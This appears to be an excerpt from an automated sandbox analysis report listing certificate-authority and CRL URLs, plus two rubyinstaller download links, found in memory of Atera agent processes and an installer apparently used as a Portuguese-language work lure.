                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, Pubnub.dll0.2.dr, System.Threading.Tasks.dll.26.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, System.Dynamic.Runtime.dll.26.dr, System.ValueTuple.dll.16.dr, System.Buffers.dll.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E741015000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A2D1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A200000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477540000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055ADA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0015E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00162000.00000004.00000800.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BCC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924832428.0000023477CF4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BC0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1585649904.000001FD5A0C8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1583936197.0000026AEAC45000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A200000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://cdn.rubyinstaller.org/archives/devkits/DevKit-mingw64-32-4.7.2-20130224-1151-sfx.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://cdn.rubyinstaller.org/archives/devkits/DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, Pubnub.dll0.2.dr, System.Threading.Tasks.dll.26.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, System.Dynamic.Runtime.dll.26.dr, System.ValueTuple.dll.16.dr, System.Buffers.dll.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C14000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E741015000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A2D1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477540000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055ADA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0015E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00162000.00000004.00000800.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msiString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2170525081.000002705518D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2266637366.000002706E167000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000023.00000002.1709494324.00000218AF07E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000023.00000003.1708494146.00000218AF07E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000023.00000003.1707796229.00000218AF04A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1827657488.0000022AD918F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1827657488.0000022AD90B0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2300042088.000001E44C5DD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000002E.00000003.2066360493.000001449A57C000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000002E.00000002.2092726238.000001449A57D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0015E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2375885446.0000010B6E73C000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00162000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2567716195.000002484553D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2561414784.0000024844E6E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2270718409.00000213B3AF3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2133420336.000002139A941000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2120854347.000001CC2B3E0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2134700713.00000165B09E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/l
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crld
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/=
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.4G
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C14000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
